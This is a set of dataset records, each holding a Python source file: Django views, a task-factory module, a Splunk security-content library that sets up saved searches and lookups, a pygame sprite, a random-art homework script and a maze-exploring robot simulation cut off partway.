form_initial = {'empresa_nombre': Registry.objects.get(nombre='SIC_ConsultaPrecio_NombreEmpresa').get_value(), \n 'empresa_slogan': Registry.objects.get(nombre='SIC_ConsultaPrecio_Slogan').get_value(), \n 'cliente_eventual': Registry.objects.get(nombre='SIC_ConsultaPrecio_Cliente').get_value()}\n form = PreferenciasManageForm(request.POST or None, initial=form_initial)\n warrning = ''\n if form.is_valid():\n form.save()\n msg = 'Datos guardados correctamente'\n imagenes = ImagenSlideChecador.objects.all().order_by('id')\n c = {'form': form, \n 'msg': msg, \n 'imagenes': imagenes}\n return render_to_response(template_name, c, context_instance=RequestContext(request))\n\n\n@login_required(login_url='/login/')\ndef imagen_manageview(request, id=None, template_name='django_microsip_consultaprecio/imagen.html'):\n if id:\n imagen = get_object_or_404(ImagenSlideChecador, pk=id)\n else:\n imagen = ImagenSlideChecador()\n if request.POST:\n form = ImagenManageForm(request.POST or None, request.FILES, instance=imagen)\n else:\n form = ImagenManageForm(instance=imagen)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/precios/preferencias/')\n else:\n c = {'form': form}\n return render_to_response(template_name, c, context_instance=RequestContext(request))\n\n\ndef eliminarimagen(request, id=None):\n imagen_a_eliminar = ImagenSlideChecador.objects.get(id=id)\n imagen_a_eliminar.delete()\n return HttpResponseRedirect('/precios/preferencias/')","sub_path":"pycfiles/django_microsip_consultaprecio-1.2.0/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"333866151","text":"\"\"\"\nContains business logic tasks for this order of the task factory.\nEach task should be wrapped inside a task closure that accepts a **kargs parameter\nused for task initialization.\n\"\"\"\n\ndef make_task_dict():\n \"\"\"\n Returns a task dictionary containing all tasks in this module.\n \"\"\"\n task_dict = {}\n task_dict[\"capitalize_words\"] = capitalize_closure\n task_dict[\"char_count\"] = char_count_closure\n task_dict[\"combine_words\"] = combine_words_closure\n return task_dict\n\n\ndef get_task(task_name, init_args):\n \"\"\"\n Accesses the task dictionary, returning the task corresponding to a given key,\n wrapped in a closure containing the task and its arguments.\n \"\"\"\n tasks = make_task_dict()\n return tasks[task_name](init_args)\n\n\ndef capitalize_closure(init_args):\n \"\"\"\n A closure around the example function which is an endpoint in the task factory.\n \"\"\"\n init_args = init_args\n async def capitalize_words(words_map):\n \"\"\"\n A simple function to illustrate use of the task factory pattern.\n \"\"\"\n words = words_map[\"strings\"]\n capitalized_words = [word.upper() for word in words]\n return {\"strings\": capitalized_words}\n return capitalize_words\n\n\ndef char_count_closure(init_args):\n \"\"\"\n A closure around the example function which is an endpoint in the task factory.\n \"\"\"\n init_args = init_args\n async def char_count(words_map):\n \"\"\"\n A simple function to illustrate use of the task factory pattern.\n \"\"\"\n words = words_map[\"strings\"]\n word_length = [len(word) for word in words]\n return {\"lengths\": word_length}\n return char_count\n\n\ndef combine_words_closure(init_args):\n \"\"\"\n A closure around the example function which is an endpoint in the task factory.\n \"\"\"\n combine_keys = init_args[\"dict_keys\"]\n final_key = init_args[\"final_key\"]\n async def combine_words(words_map):\n \"\"\"\n A simple function to illustrate use of the task factory pattern.\n \"\"\"\n return_dict = {final_key: \"\"}\n for combine_key in combine_keys:\n return_dict[final_key] += words_map[combine_key]\n return return_dict\n return combine_words\n","sub_path":"ephemeral/tasks/src/main/strings/operations/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"199741660","text":"import requests\nimport json\nimport splunk.mining.dcutils\nimport time\nimport re\nimport requests\nimport os\n\nclass ASXLib:\n logger = splunk.mining.dcutils.getLogger()\n\n def __init__(self, service, api_url):\n self.service = service\n if api_url.endswith('/'):\n self.api_url = api_url[:-1]\n else:\n self.api_url = api_url\n\n def list_analytics_stories(self):\n url = self.api_url + '/stories'\n response = self.__call_security_content_api(url)\n self.logger.info(\"asx_lib.py - listing stories - {0}\\n\".format(response))\n return response['stories']\n\n\n def get_analytics_story(self, name):\n\n if name == 'All':\n url = self.api_url + '/stories'\n else:\n url = self.api_url + '/stories/' + name\n\n response = self.__call_security_content_api(url)\n\n self.__generate_standard_macros(self.service)\n\n for story in response['stories']:\n for detection in story['detections']:\n if 'macros' in detection:\n for macro in detection['macros']:\n self.logger.info(\"asx_lib.py - generate macros.conf for: {0}\".format(macro['name']))\n self.__generate_macro(self.service, macro)\n\n if 'lookups' in macro:\n for lookup in macro['lookups']:\n self.__generate_lookup(self.service, lookup)\n\n self.logger.info(\"asx_lib.py - generate savedsearches.conf for detection: {0}\".format(detection['name']))\n kwargs = self.__generate_detection(self.service, detection)\n\n if 'baselines' in detection:\n for baseline in detection['baselines']:\n self.logger.info(\"asx_lib.py - generate savedsearches.conf for baseline: {0}\".format(baseline['name']))\n self.__generate_baseline(self.service, baseline)\n\n if 'lookups' in baseline:\n for lookup in baseline['lookups']:\n self.__generate_lookup(self.service, lookup)\n\n if 'lookups' in detection:\n for lookup in detection['lookups']:\n self.__generate_lookup(self.service, lookup)\n\n return 0\n\n\n\n def schedule_analytics_story(self, name, earliest_time, latest_time, cron_schedule):\n search_name = []\n\n for search in self.service.saved_searches:\n if 'action.escu.analytic_story' in search:\n if name in search['action.escu.analytic_story']:\n if search['action.escu.search_type'] == \"support\":\n query = search['search']\n self.logger.info(\"asx_lib.py - schedule baseline - {} - {}\\n\".format(search['action.escu.full_search_name'], query))\n self.logger.info(\"asx_lib.py - schedule baseline earliest_time latest_time - {} - {}\\n\".format(earliest_time, latest_time))\n kwargs = {\"disabled\": \"false\",\n \"is_scheduled\": True,\n \"cron_schedule\": cron_schedule,\n \"dispatch.earliest_time\": earliest_time,\n \"dispatch.latest_time\": latest_time,\n \"search\": search['search']\n }\n search.update(**kwargs).refresh()\n search_name.append(search['action.escu.full_search_name'])\n\n if search['action.escu.search_type'] == \"detection\":\n mappings = json.loads(search['action.escu.mappings'])\n if \"| collect\" in search['search']:\n query = search['search'].split(\"| collect\",1)[0]\n else:\n query = search['search']\n\n if \"mitre_attack\" in mappings:\n query = query + ' | collect index=asx sourcetype=asx marker=\"mitre_id=' + mappings[\"mitre_attack\"][0] + ', execution_type=scheduled\"'\n else:\n query = query + ' | collect index=asx sourcetype=asx marker=\"execution_type=scheduled\"'\n\n self.logger.info(\"asx_lib.py - schedule detection - {} - {}\\n\".format(search['action.escu.full_search_name'], query))\n self.logger.info(\"asx_lib.py - schedule detection earliest_time latest_time - {} - {}\\n\".format(earliest_time, latest_time))\n kwargs = {\"disabled\": \"false\",\n \"is_scheduled\": True,\n \"cron_schedule\": cron_schedule,\n \"dispatch.earliest_time\": earliest_time,\n \"dispatch.latest_time\": latest_time,\n \"search\": query\n }\n search.update(**kwargs).refresh()\n search_name.append(search['action.escu.full_search_name'])\n\n return search_name\n\n\n def run_analytics_story(self, name, earliest_time, latest_time):\n search_name = []\n execution_time = str(time.time())\n saved_searches = []\n\n for search in self.service.saved_searches:\n if 'action.escu.analytic_story' in search:\n if name in search['action.escu.analytic_story']:\n if search['action.escu.search_type'] == \"support\":\n saved_searches.insert(0,search)\n else:\n saved_searches.append(search)\n\n for search in saved_searches:\n if search['action.escu.search_type'] == \"support\":\n query = search['search']\n self.logger.info(\"asx_lib.py - run baseline - {} - {}\\n\".format(search['action.escu.full_search_name'],query))\n kwargs = { \"exec_mode\": \"blocking\",\n \"disabled\": False,\n \"dispatch.earliest_time\": earliest_time,\n \"dispatch.latest_time\": latest_time}\n jobs = self.service.jobs\n job = jobs.create(query, **kwargs)\n search_name.append(search['action.escu.full_search_name'])\n\n #Running Detections\n if search['action.escu.search_type'] == \"detection\":\n\n mappings = json.loads(search['action.escu.mappings'])\n if \"| collect\" in search['search']:\n query = search['search'].split(\"| collect\",1)[0]\n else:\n query = search['search']\n\n if \"mitre_attack\" in mappings:\n query = query + ' | collect index=asx sourcetype=asx marker=\"mitre_id=' + mappings[\"mitre_attack\"][0] + ', execution_type=adhoc, execution_time=' + execution_time + '\"'\n else:\n query = query + ' | collect index=asx sourcetype=asx marker=\"execution_type=adhoc, execution_time=' + execution_time + '\"'\n\n self.logger.info(\"asx_lib.py - run detection - {} - {}\\n\".format(search['action.escu.full_search_name'], query))\n\n kwargs = { \"disabled\": False,\n \"dispatch.earliest_time\": earliest_time,\n \"dispatch.latest_time\": latest_time,\n \"search\": query}\n\n search.update(**kwargs).refresh()\n job = search.dispatch()\n search_name.append(search['action.escu.full_search_name'])\n\n return search_name\n\n def __call_security_content_api(self, url):\n resp = requests.get(url)\n if resp.status_code != 200:\n # this is only temporary, needs to be fixed in API\n #raise requests.HTTPError('Error {} by calling {}'.format(resp.status_code, url))\n return 0\n else:\n # this is only temporary, needs to be fixed in API\n return resp.json()\n\n def __generate_macro(self, service, macro):\n if not (macro['name'] == 'security_content_ctime' or macro['name'] == 'security_content_summariesonly'):\n service.post('properties/macros', __stanza=macro['name'])\n service.post('properties/macros/' + macro['name'], definition=macro['definition'], description=macro['description'])\n\n def __generate_standard_macros(self, service):\n service.post('properties/macros', __stanza=\"security_content_ctime(1)\")\n service.post('properties/macros/security_content_ctime(1)', definition='convert timeformat=\"%m/%d/%Y %H:%M:%S\" ctime($field$)', description='convert epoch time to string', args='field')\n\n service.post('properties/macros', __stanza=\"security_content_summariesonly\")\n service.post('properties/macros/security_content_summariesonly', definition='summariesonly=true allow_old_summaries=true', description=\"search data models summaries only\", args='field')\n\n def __generate_lookup(self, service, lookup):\n kwargs = {}\n if 'filename' in lookup:\n if not os.path.exists('/opt/splunk/var/run/splunk/lookup_tmp'):\n os.makedirs('/opt/splunk/var/run/splunk/lookup_tmp')\n url = 'https://security-content.s3-us-west-2.amazonaws.com/lookups/' + lookup['filename']\n r = requests.get(url, allow_redirects=True)\n lookup_table_file_path = '/opt/splunk/var/run/splunk/lookup_tmp/' + lookup['filename']\n open(lookup_table_file_path, 'wb').write(r.content)\n kwargs2 = {}\n kwargs2.update({\"eai:data\": lookup_table_file_path})\n kwargs2.update({\"name\": lookup['filename']})\n service.post('data/lookup-table-files', **kwargs2)\n kwargs.update({\"filename\": lookup['filename']})\n else:\n kwargs.update({\"collection\": lookup['collection']})\n kwargs.update({\"external_type\": 'kvstore'})\n if 'default_match' in lookup:\n kwargs.update({\"default_match\": lookup['default_match']})\n if 'case_sensitive_match' in lookup:\n kwargs.update({\"case_sensitive_match\": lookup['case_sensitive_match']})\n if 'description' in lookup:\n kwargs.update({\"description\": lookup['description']})\n if 'match_type' in lookup:\n kwargs.update({\"match_type\": lookup['match_type']})\n if 'max_matches' in lookup:\n kwargs.update({\"max_matches\": lookup['max_matches']})\n if 'min_matches' in lookup:\n kwargs.update({\"min_matches\": lookup['min_matches']})\n if 'fields_list' in lookup:\n kwargs.update({\"fields_list\": lookup['fields_list']})\n if 'filter' in lookup:\n kwargs.update({\"filter\": lookup['filter']})\n\n try:\n service.post('properties/transforms', __stanza=lookup['name'])\n service.post('properties/transforms/' + lookup['name'], **kwargs)\n except Exception as e:\n self.logger.error(\"Failed to store lookup \" + lookup['name'] + \" with error: \" + str(e))\n\n\n def __generate_baseline(self, service, baseline):\n full_search_name = str(\"ESCU - \" + baseline['name'])\n resp = service.saved_searches.list()\n\n # if there are detections with the same name, don't override\n if not any(x.name == full_search_name for x in resp):\n kwargs = {}\n kwargs.update({\"action.escu\": \"0\"})\n kwargs.update({\"action.escu.enabled\": \"1\"})\n kwargs.update({\"action.escu.search_type\": \"support\"})\n kwargs.update({\"action.escu.full_search_name\": full_search_name})\n kwargs.update({\"description\": baseline['description']})\n kwargs.update({\"action.escu.creation_date\": baseline['date']})\n kwargs.update({\"action.escu.modification_date\": baseline['date']})\n\n if 'analytics_story' in baseline['tags']:\n kwargs.update({\"action.escu.analytic_story\": json.dumps(baseline['tags']['analytics_story'])})\n\n correlation_rule = baseline['search']\n\n kwargs.update({\"cron_schedule\": \"*/30 * * * *\" })\n kwargs.update({\"dispatch.earliest_time\": \"-30m\" })\n kwargs.update({\"dispatch.latest_time\": \"now\" })\n kwargs.update({\"action.escu.eli5\": baseline['description']})\n\n if 'how_to_implement' in baseline:\n kwargs.update({\"action.escu.how_to_implement\": baseline['how_to_implement']})\n else:\n kwargs.update({\"action.escu.how_to_implement\": \"none\"})\n\n if 'known_false_positives' in baseline:\n kwargs.update({\"action.escu.known_false_positives\": baseline['known_false_positives']})\n else:\n kwargs.update({\"action.escu.known_false_positives\": \"None\"})\n\n kwargs.update({\"disabled\": \"true\"})\n kwargs.update({\"schedule_window\": \"auto\"})\n kwargs.update({\"is_visible\": \"false\"})\n\n query = baseline['search']\n query = query.encode('ascii', 'ignore').decode('ascii')\n\n search = full_search_name\n search = search.encode('ascii', 'ignore').decode('ascii')\n\n try:\n savedsearch = service.saved_searches.create(search, query, **kwargs)\n except Exception as e:\n self.logger.error(\"Failed to store detection \" + baseline['name'] + \" with error: \" + str(e))\n\n\n def __generate_detection(self, service, detection):\n\n full_search_name = str(\"ESCU - \" + detection['name'] + \" - Rule\")\n resp = service.saved_searches.list()\n\n keys = ['mitre_attack', 'kill_chain_phases', 'cis20', 'nist']\n mappings = {}\n for key in keys:\n if key == 'mitre_attack':\n if 'mitre_attack_id' in detection['tags']:\n mappings[key] = detection['tags']['mitre_attack_id']\n else:\n if key in detection['tags']:\n mappings[key] = detection['tags'][key]\n detection['mappings'] = mappings\n\n data_model = self.parse_data_models_from_search(detection['search'])\n if data_model:\n detection['data_model'] = data_model\n\n nes_fields = self.get_nes_fields(detection['search'])\n if len(nes_fields) > 0:\n detection['nes_fields'] = nes_fields\n\n # if there are detections with the same name, don't override\n if not any(x.name == full_search_name for x in resp):\n kwargs = {}\n kwargs.update({\"action.escu\": \"0\"})\n kwargs.update({\"action.escu.enabled\": \"1\"})\n kwargs.update({\"description\": detection['description'] })\n kwargs.update({\"action.escu.mappings\": json.dumps(detection['mappings']) })\n if 'data_model' in detection:\n kwargs.update({\"action.escu.data_models\": json.dumps(detection['data_model']) })\n kwargs.update({\"action.escu.eli5\": detection['description'] })\n if 'how_to_implement' in detection:\n kwargs.update({\"action.escu.how_to_implement\": detection['how_to_implement'] })\n else:\n kwargs.update({\"action.escu.how_to_implement\": \"none\"})\n if 'known_false_positives' in detection:\n kwargs.update({\"action.escu.known_false_positives\": detection['known_false_positives'] })\n else:\n kwargs.update({\"action.escu.known_false_positives\": \"None\"})\n kwargs.update({\"action.escu.creation_date\": detection['date'] })\n kwargs.update({\"action.escu.modification_date\": detection['date'] })\n kwargs.update({\"action.escu.confidence\": \"high\" })\n kwargs.update({\"action.escu.full_search_name\": full_search_name })\n kwargs.update({\"action.escu.search_type\": \"detection\"})\n kwargs.update({\"action.escu.providing_technologies\": \"[]\" })\n\n if 'analytics_story' in detection['tags']:\n kwargs.update({\"action.escu.analytic_story\": json.dumps(detection['tags']['analytics_story']) })\n\n kwargs.update({\"cron_schedule\": \"*/30 * * * *\" })\n kwargs.update({\"dispatch.earliest_time\": \"-30m\" })\n kwargs.update({\"dispatch.latest_time\": \"now\" })\n kwargs.update({\"action.correlationsearch\": \"1\"})\n kwargs.update({\"action.correlationsearch.enabled\": \"1\"})\n kwargs.update({\"action.correlationsearch.label\": full_search_name })\n kwargs.update({\"schedule_window\": \"auto\"})\n kwargs.update({\"action.notable\": \"1\"})\n if 'nes_fields' in detection:\n kwargs.update({\"action.notable.param.nes_fields\": detection['nes_fields'] })\n\n kwargs.update({\"action.notable.param.rule_description\": detection['description'] })\n kwargs.update({\"action.notable.param.rule_title\": full_search_name })\n kwargs.update({\"action.notable.param.security_domain\": detection['tags']['security_domain'] })\n kwargs.update({\"action.notable.param.severity\": \"high\" })\n kwargs.update({\"alert.track\": \"1\"})\n kwargs.update({\"action.escu.earliest_time_offset\": \"3600\"})\n kwargs.update({\"action.escu.latest_time_offset\": \"86400\"})\n kwargs.update({\"is_scheduled\": \"1\"})\n kwargs.update({\"alert_type\": \"number of events\"})\n kwargs.update({\"alert_comparator\": \"greater than\"})\n kwargs.update({\"alert_threshold\": \"0\"})\n #kwargs.update({\"realtime_schedule\": \"0\"})\n kwargs.update({\"disabled\": \"true\"})\n kwargs.update({\"is_visible\": \"false\"})\n\n query = detection['search']\n query = query.encode('ascii', 'ignore').decode('ascii')\n\n search = full_search_name\n search = search.encode('ascii', 'ignore').decode('ascii')\n\n try:\n savedsearch = service.saved_searches.create(search, query, **kwargs)\n except Exception as e:\n self.logger.error(\"Failed to store detection \" + detection['name'] + \" with error: \" + str(e))\n\n\n\n\n def get_nes_fields(self, search):\n nes_fields_matches = []\n match_obj = ['user', 'dest', 'src']\n for field in match_obj:\n if (search.find(field + ' ') != -1):\n nes_fields_matches.append(field)\n\n return nes_fields_matches\n\n\n def parse_data_models_from_search(self, search):\n match = re.search(r'from\\sdatamodel\\s?=\\s?([^\\s.]*)', search)\n if match is not None:\n return match.group(1)\n return False\n","sub_path":"bin/asx_lib.py","file_name":"asx_lib.py","file_ext":"py","file_size_in_byte":18808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"398210095","text":"# 障碍类\nimport pygame\nfrom Setting import Setting\n\n\nclass Enemy(pygame.sprite.Sprite):\n\n def __init__(self, img, init_pos):\n pygame.sprite.Sprite.__init__(self)\n self.image = img\n self.rect = self.image.get_rect()\n self.rect.topleft = init_pos\n self.speed = 2\n self.borld = Setting().windows\n\n def update(self):\n self.rect.top += self.speed\n\n if self.rect.top > self.borld[1]:\n self.kill()\n","sub_path":"Enemy.py","file_name":"Enemy.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441863294","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 11:34:57 2014\n\n@author: pruvolo and ddiggins\n\"\"\"\n\n# you do not have to use these particular modules, but they may help\n#(The are super helpful)\n\n\nfrom random import *\nimport Image\nfrom math import *\n\n\n## SS: Great job in general!! I would say, unless your '#' comments help you understand what's going\n## on, you probably don't need as much as you've put in this assignment. If you have a good \n## doc string and variable names, the amount of commenting you need to do is not much. \n\ndef build_random_function(min_depth, max_depth):\n \"\"\"Takes a minimum and maximum nesting depth and returns a randomly\n generated function comprised of sin_pi, cos_pi, prod, sqr, avg, x, and y\"\"\"\n \n xylist = [\"x\", \"y\"] #Creates a list of just x and y for use if max_depth <= 1\n \n if max_depth <= 1:\n return xylist[randint(0,1)] #Jumps right to x and y values of max_depth has been reached or somehow exceeded\n \n recurse1 = build_random_function(min_depth-1, max_depth-1) #a and b are assigned values for nesting\n recurse2 = build_random_function(min_depth-1, max_depth-1)\n \n product = [\"prod\",recurse1,recurse2] #Calculates the product of two values\n sin = [\"sin_pi\",recurse1] #Calculates the sine in radians of a value times pi\n cos = [\"cos_pi\",recurse1] #Calculates the cosine in radians of a value times pi\n square = [\"sqr\",recurse1] #Calculates the square of a signle value\n cube = [\"cube\",recurse2] #Calculates the average of two values\n x = recurse1 #Inserts a single value\n y = recurse2 #Inserts a single value\n \n functions = [product, sin, cos, square, cube, x, y] #groups above functions into a readable list\n \n if min_depth > 1: #If min_depth has not been reached, x and y cannot be called\n lists = functions[randrange(0, 4)]\n elif min_depth <= 1: #x and y can be called randomly after min_depth has been reached\n lists = functions[randrange(0, len(functions))]\n \n return lists #returns the big function list\n\n\n## SS: It might be a good idea to put all of your 'execution' code in a main function at the end\n## of this file\nbuiltfunc = build_random_function(3, 7)\n\n\n## SS: Passed my tests :)\ndef evaluate_random_function(builtfunction, x, y):\n \"\"\"Evaluates the random function generated in build_random_function.\n f = the input function from build_random_function\n [x, y] = floats in the range of [-1, 1]\n \"\"\"\n \n xylist = [x, y] #Creates a smilar list to build_random_function, but uses the actual x and y values\n \n #There are just so many if statements\n \n if builtfunction[0] == 'prod':\n return evaluate_random_function(builtfunction[1], x, y)*evaluate_random_function(builtfunction[2], x, y) #Computes the product of the next two values if the first value in the list indicates a product\n \n elif builtfunction[0] == 'sin_pi':\n return sin(pi * evaluate_random_function(builtfunction[1], x, y)) #Computes sine(pi * a) where a is the next value in the built function\n \n elif builtfunction[0] == 'cos_pi':\n return cos(pi * evaluate_random_function(builtfunction[1], x, y)) #Compues cos(pi * a) where a is the next value in the built function\n\n elif builtfunction[0] == 'sqr':\n return evaluate_random_function(builtfunction[1], x, y)**2 #Returns the square of the next value of the built function\n\n elif builtfunction[0] == 'cube':\n return (evaluate_random_function(builtfunction[1], x, y)**3) #Returns the cube of the next value of built function if the first is 'cube'\n\n elif builtfunction[0] == 'x':\n return xylist[0] #Returns the value of x at the maximum depth of builtfunction\n\n elif builtfunction[0] == 'y':\n return xylist[1] #Returns the value of y at the maximum depth of builtfunction\n \nevalfunc = evaluate_random_function(builtfunc, -.02435, .93425)\n\n## SS: Passed my tests :)\ndef remap_interval(val, input_interval_start, input_interval_end, output_interval_start, output_interval_end):\n \"\"\" Maps the input value that is in the interval [input_interval_start, input_interval_end]\n to the output interval [output_interval_start, output_interval_end]. The mapping\n is an affine one (i.e. output = input*c + b).\n \n The output of the function is determined by calculatioing the ratio between the \n first interval and the distance from the interval start to val. This ratio is\n multiplied by the length of the second interval and added to the value of the output interval's\n starting value.\n \"\"\"\n \n length = input_interval_end-input_interval_start #Calculates difference between start and end of input interval\n \n dist_from_start = val - input_interval_start #Calculates distance between val and start of input interval\n \n ratio = dist_from_start/float(length) #Establishes a ratio of this \n \n length2 = output_interval_end - output_interval_start #Multiplies this ratio by the length of the output interval\n \n value = output_interval_start + length2 * ratio #Calculates a value by multiplying length2 by ratio and adding the start value of the output interval\n \n return value\n\n#print remap_interval(evalfunc, -1, 1, 0, 255)\n\ndef draw_picture():\n \"\"\"Calling build_random_function, evaluate_random_function, and remap_interval,\n creates and saves an image produced by mapping RGB values to individual pixels in an image.\n \"\"\"\n im = Image.new(\"RGB\", (350, 350),\"black\") #Creates a 350px square image\n \n pixels = im.load() #Creates a pixel array\n \n red = build_random_function(6, 15) #Builds RGB functions from build_random_functions\n blue = build_random_function(1, 7) #I chose these depth values because they made me happy\n green = build_random_function(5, 10) #OverlyHonestMethods\n \n\n for xpixel in range(0, 349):\n for ypixel in range(0, 349): #Traverses every xpixel and ypixel\n xpix = remap_interval(xpixel, 0, 349, -1, 1) #Remaps x and y pixels to a -1, 1 range for use in evaluate_random_function\n ypix = remap_interval(ypixel, 0, 349, -1, 1)\n \n redchannel = evaluate_random_function(red, xpix, ypix) #Determines x and y values of functions from xpix and ypix\n bluechannel = evaluate_random_function(blue, xpix, ypix)\n greenchannel = evaluate_random_function(green, xpix, ypix)\n \n redchannel = int(remap_interval(redchannel, -1, 1, 0, 255)) #Converts channels to inegers for plotting\n bluechannel = int(remap_interval(bluechannel, -1, 1, 0, 255))\n greenchannel = int(remap_interval(greenchannel, -1, 1, 0, 255))\n \n pixels[xpixel, ypixel] = (redchannel, bluechannel, greenchannel) #Plots tuple for every pixel\n \n im.save(\"Image10.png\") #Ka-save!\n\ndraw_picture() #I am sorry that my comments got less serious as I got more tired\n ","sub_path":"hw4/random_art.py","file_name":"random_art.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"149622385","text":"#Use this space to test code alongside lessons\n\n#age = input(\"What is your age? \")\n#print age\n\n'''\ncount = 13\n\ndef printer(count):\n while count != 0:\n count = count - 1\n print(\"hi\")\n\nprinter(count)\n'''\n\n#def product(num1, num2):\n# return num1 * num2\nitems = ['a','b','c','STOP','d']\n\ndef loopy(items):\n for index, item in enumerate(items):\n if item == 'STOP':\n break\n else:\n print(str(item))\n\nloopy(items)\n","sub_path":"tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"200244140","text":"# This script creates a grid with 20x15 cells.\n\nimport pygame\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nGREY = (128, 128, 128)\nORANGE = (255,165,0)\n\n# This sets the WIDTH and HEIGHT of each grid location\nWIDTH = 20\nHEIGHT = 20\n\n# This sets the margin between each cell\nMARGIN = 3\n\nROWS = 20\nCOLUMNS = 15\n\n# Grid is an array of cells of the maze.\ngrid = []\n\n\nclass Cell:\n def __init__(self, row_, column_, explored):\n self.obstacle = 0\n self.virtual_wall = 0\n self.explored = explored\n self.row = row_\n self.column = column_\n\n\nclass Robot:\n def __init__(self):\n self.row = 18\n self.column = 1\n self.direction = \"E\"\n\n\nfor row in range(ROWS):\n grid.append([])\n for column in range(COLUMNS):\n cell = Cell(row, column, 0)\n grid[row].append(cell) # Append a cell\n\nrobot = Robot()\ngrid[9][1].obstacle = 1\n\ngrid[14][3].obstacle = 1\ngrid[14][4].obstacle = 1\ngrid[14][5].obstacle = 1\ngrid[15][5].obstacle = 1\n\ngrid[3][4].obstacle = 1\ngrid[4][4].obstacle = 1\ngrid[5][4].obstacle = 1\n\ngrid[0][8].obstacle = 1\n\ngrid[9][6].obstacle = 1\ngrid[9][7].obstacle = 1\n\ngrid[5][9].obstacle = 1\ngrid[5][10].obstacle = 1\ngrid[5][11].obstacle = 1\ngrid[5][12].obstacle = 1\ngrid[5][13].obstacle = 1\ngrid[5][14].obstacle = 1\n\ngrid[14][11].obstacle = 1\ngrid[15][11].obstacle = 1\ngrid[16][11].obstacle = 1\ngrid[17][11].obstacle = 1\n\n\ndef update_explored_cells(robot_, grid_):\n row_ = robot_.row\n column_ = robot_.column\n \n for i in range(row_ - 1, row_ + 2):\n for j in range(column_ - 1, column_ + 2):\n grid_[i][j].explored = 1\n\n\ndef robot_movement(robot_):\n row_ = robot_.row\n column_ = robot_.column\n \n if robot_.direction == \"N\":\n robot_.row -= 1\n \n elif robot_.direction == \"S\":\n robot_.row += 1\n \n elif robot_.direction == \"E\":\n robot_.column += 1\n\n elif robot_.direction == \"W\":\n robot_.column -= 1\n \n else:\n pass\n\n\ndef update_robot_dir(robot_):\n if check_right(robot_):\n if robot_.direction == \"E\":\n robot_.direction = \"S\"\n \n elif robot_.direction == \"N\":\n robot_.direction = \"E\"\n \n elif robot_.direction == \"W\":\n robot_.direction = \"N\"\n\n elif robot_.direction == \"S\":\n robot_.direction = \"W\"\n \n elif check_forward(robot_):\n pass\n\n elif check_left(robot_):\n if robot_.direction == \"E\":\n robot_.direction = \"N\"\n \n elif robot_.direction == \"N\":\n robot_.direction = \"W\"\n \n elif robot_.direction == \"W\":\n robot_.direction = \"S\"\n\n elif robot_.direction == \"S\":\n robot_.direction = \"E\"\n\n else:\n if robot_.direction == \"E\":\n robot_.direction = \"W\"\n \n elif robot_.direction == \"N\":\n robot_.direction = \"S\"\n \n elif robot_.direction == \"W\":\n robot_.direction = \"E\"\n\n elif robot_.direction == \"S\":\n robot_.direction = \"N\"\n\n\ndef check_right(robot_):\n row_ = robot_.row\n column_ = robot_.column\n \n if robot_.direction == \"N\":\n if column_ != COLUMNS-2 and check_obs_east(row_, column_):\n return True\n\n elif robot_.direction == \"S\":\n if column_ != 1 and check_obs_west(row_, column_):\n return True\n\n elif robot_.direction == \"E\":\n if row_ != ROWS-2 and check_obs_south(row_, column_):\n return True\n\n elif robot_.direction == \"W\":\n if row_ != 1 and check_obs_north(row_, column_):\n return True\n\n return False\n\n\ndef check_forward(robot_):\n row_ = robot_.row\n column_ = robot_.column\n \n if robot_.direction == \"N\": \n if row_ != 1 and check_obs_north(row_, column_):\n return True\n\n elif robot_.direction == \"S\":\n if row_ != ROWS-2 and check_obs_south(row_, column_):\n return True\n\n elif robot_.direction == \"E\":\n if column_ != COLUMNS-2 and check_obs_east(row_, column_):\n return True\n\n elif robot_.direction == \"W\":\n if column_ != 1 and check_obs_west(row_, column_):\n return True\n\n return False\n\n\ndef check_left(robot_):\n row_ = robot_.row\n column_ = robot_.column\n \n if robot_.direction == \"N\":\n if column_ != 1 and check_obs_west(row_, column_):\n return True\n\n elif robot_.direction == \"S\":\n if column_ != COLUMNS-2 and check_obs_east(row_, column_):\n return True\n\n elif robot_.direction == \"E\":\n if row_ != 1 and check_obs_north(row_, column_):\n return True\n\n elif robot_.direction == \"W\":\n if row_ != ROWS-2 and check_obs_south(row_, column_):\n return True\n\n return False\n\n\ndef check_obs_north(row_, column_):\n if (grid[row_ - 2][column_].obstacle, grid[row_ - 2][column_ + 1].obstacle, grid[row_ - 2][column_ - 1].obstacle) == (0, 0, 0):\n return True\n\n return False\n\n\ndef check_obs_south(row_, column_):\n if (grid[row_ + 2][column_].obstacle, grid[row_ + 2][column_ + 1].obstacle, grid[row_ + 2][column_ - 1].obstacle) == (0, 0, 0):\n return True\n\n return False\n\n\ndef check_obs_east(row_, column_):\n if (grid[row_][column_ + 2].obstacle, grid[row_ + 1][column_ + 2].obstacle, grid[row_ - 1][column_ + 2].obstacle) == (0, 0, 0):\n return True\n\n return False\n\n\ndef check_obs_west(row_, column_):\n if (grid[row_][column_ - 2].obstacle, grid[row_ + 1][column_ - 2].obstacle, grid[row_ - 1][column_ - 2].obstacle) == (0, 0, 0):\n return True\n\n return False\n\n\n\n\npygame.init()\nWINDOW_SIZE = [500, 480]\nscreen = pygame.display.set_mode(WINDOW_SIZE, pygame.RESIZABLE)\nfont = pygame.font.SysFont(\"comicsansms\", 24)\ntext = font.render(\"GO!\", True, (0, 128, 0))\ndone = False\nmove = False\nclock = pygame.time.Clock()\n\nwhile not done:\n pos = pygame.mouse.get_pos()\n \n for event in pygame.event.get(): # User did something\n if event.type 